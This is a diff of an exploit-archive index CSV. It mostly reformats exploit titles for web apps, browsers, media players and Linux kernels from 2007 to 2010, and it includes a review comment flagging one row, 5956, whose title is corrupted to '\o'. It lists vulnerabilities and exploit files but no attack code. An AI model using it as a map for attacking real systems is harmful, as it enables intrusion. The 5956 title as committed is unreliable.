 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0
 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0
-4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0
+4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0
 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0
 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0
 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0
@@ -4596,7 +4596,7 @@ id,file,description,date,author,platform,type,port
 4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0
 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0
-4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0
+4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0
 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0
 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0
 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0
@@ -4786,7 +4786,7 @@ id,file,description,date,author,platform,type,port
 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0
-5149,platforms/php/webapps/5149.txt,"sCssBoard (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
+5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - RFI",2008-02-18,Crackers_Child,hardware,remote,0
 5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0
 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0
@@ -5028,7 +5028,7 @@ id,file,description,date,author,platform,type,port
 5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0
 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
-5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
+5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0
 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0
@@ -5196,7 +5196,7 @@ id,file,description,date,author,platform,type,port
 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0
 5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0
 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69
-5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0
+5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0
 5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0
 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
@@ -5560,7 +5560,7 @@ id,file,description,date,author,platform,type,port
 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0
 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0
-5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0
+5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0
 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
@@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
-5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
+5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
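Review bot: The new 5956 row has lost its product name — the description field now reads `"\o - Local File Inclusion (1st)"`, which looks like an editor escape artefact rather than an intended rename, since every other rewritten row in this commit only inserts or moves a ` - ` separator. The sibling 5940 row in the -5560 hunk keeps `Keller Web Admin CMS 0.94 Pro - Local File Inclusion`, so the intended value is almost certainly `5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0`. As committed, anyone searching this index by product name no longer finds entry 5956, and the stray backslash may also confuse consumers that treat it as an escape character.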
@@ -5718,7 +5718,7 @@ id,file,description,date,author,platform,type,port
 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
-6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
+6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0
 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0
 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
@@ -6402,7 +6402,7 @@ id,file,description,date,author,platform,type,port
 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0
 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
-6837,platforms/php/webapps/6837.txt,"Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0
+6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0
 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
@@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0
@@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port
 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0
 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80
 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0
-8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
+8556,platforms/linux/remote/8556.c,"Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0
 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0
 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0
@@ -8252,7 +8252,7 @@ id,file,description,date,author,platform,type,port
 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0
-8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0
+8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0
 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
@@ -8268,7 +8268,7 @@ id,file,description,date,author,platform,type,port
 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection",2009-05-22,Qabandi,php,webapps,0
 8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
-8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
+8771,platforms/php/webapps/8771.htm,"ZaoCMS - (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
 8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0
 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0
@@ -8290,7 +8290,7 @@ id,file,description,date,author,platform,type,port
 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0
 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0
 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0
-8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0
+8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0
 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0
 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0
 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0
@@ -8701,7 +8701,7 @@ id,file,description,date,author,platform,type,port
 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0
 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0
-9226,platforms/php/webapps/9226.txt,"phpdirectorysource (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
+9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0
 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0
@@ -8715,7 +8715,7 @@ id,file,description,date,author,platform,type,port
 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
 9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
-9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
+9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
@@ -8734,7 +8734,7 @@ id,file,description,date,author,platform,type,port
 9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
+9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0
 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0
 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
@@ -8809,7 +8809,7 @@ id,file,description,date,author,platform,type,port
 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
-9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
+9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0
@@ -8848,7 +8848,7 @@ id,file,description,date,author,platform,type,port
 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0
 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0
-9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
+9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0
 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0
@@ -8940,10 +8940,10 @@ id,file,description,date,author,platform,type,port
 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
-9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
+9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
-9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
+9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0
@@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port
 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
-9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
+9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0
 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BoF Exploit (SEH)",2009-08-31,hack4love,windows,local,0
@@ -10600,7 +10600,7 @@ id,file,description,date,author,platform,type,port
 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0
 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0
 11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0
-11588,platforms/php/webapps/11588.txt,"phpMySite (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0
+11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0
 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0
 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0
 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0
@@ -10653,7 +10653,7 @@ id,file,description,date,author,platform,type,port
